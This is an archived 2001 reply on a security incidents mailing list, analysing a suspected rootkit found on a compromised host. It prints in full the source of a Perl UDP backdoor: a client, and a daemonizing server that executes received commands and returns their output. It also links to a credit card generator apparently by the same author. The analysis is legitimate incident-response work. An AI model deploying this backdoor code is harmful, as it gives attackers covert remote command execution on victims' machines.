Security Incidents mailing list archives
Re: New rootkit?
From: Blake Frantz <blake () mc net>
Date: Wed, 12 Dec 2001 14:18:54 -0600 (CST)
I recognize the perl script. I have it and the client portion of it. <client> #!/usr/bin/perl use IO::Socket; use Getopt::Std; getopts('s:p:h', \%opt)||die("Error: Unable to get command line options !!!\n"); if(defined($opt{'h'})) { \&usage() } if(defined($opt{'s'})) { $server=$opt{'s'} } else { \&usage() } if(defined($opt{'p'})) { $port=$opt{'p'} } else { \&usage() } $|=1; $maxlen=1024; $sock=IO::Socket::INET->new(Proto=>'udp') or die("Error: Cannot initialize socket !!!\n"); $ipaddr=inet_aton($server); $portaddr=sockaddr_in($port, $ipaddr); print("\nAUDP Backdoor started.\n"); print("======================\n"); while(1) { print("=> "); $mesg=<STDIN>; chomp $mesg; if($mesg!~/^\s*$/) { send($sock, $mesg."\n", 0, $portaddr)==length($mesg."\n"); while($portaddr=recv($sock, $msg, $maxlen, 0)) { if($msg=~/^\-end\.$/) { last } else { print $msg; } } } } sub usage() { print("\nAUDP - Programmed by Anarchy\n"); print("============================\n"); print("Usage: AUDP -s <host> -p <port>\n\n"); exit 1; } </client> I googled and found what appears to be another perl script written by the same author: http://fringe.davesource.com/Fringe/Hacking/Hacks/Credit_Card_Generator If you compare the sigs in the code they appear to be written by the person who sat/is sitting at anarchy () elxsi de. Hope this helps. -Blake
/usr/lib/.r00t/.r00tshocky was a perl script to listen for messages on UDP: #!/usr/bin/perl $pid=fork; exit if $pid; die("Error.") unless defined($pid); use IO::Socket; use POSIX; POSIX::setsid(); $time_to_die=0; sub signal_handler { $time_to_die=1; } $SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler; until($time_to_die) { $|=1; $port=4816; $maxlen=1024; my($sock, $raddr, $rhost); $sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or die("Error.Merge deja\n"); while($sock->recv($msg, $maxlen)) { print $msg; my($rport, $ipaddr)=sockaddr_in($sock->peername); $rhost=gethostbyaddr($ipaddr, AF_INET); $output=`$msg`; $sock->send($output); $sock->send("-end."); } }
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- New rootkit? UIA Security (Dec 12)
- Re: New rootkit? Blake Frantz (Dec 13)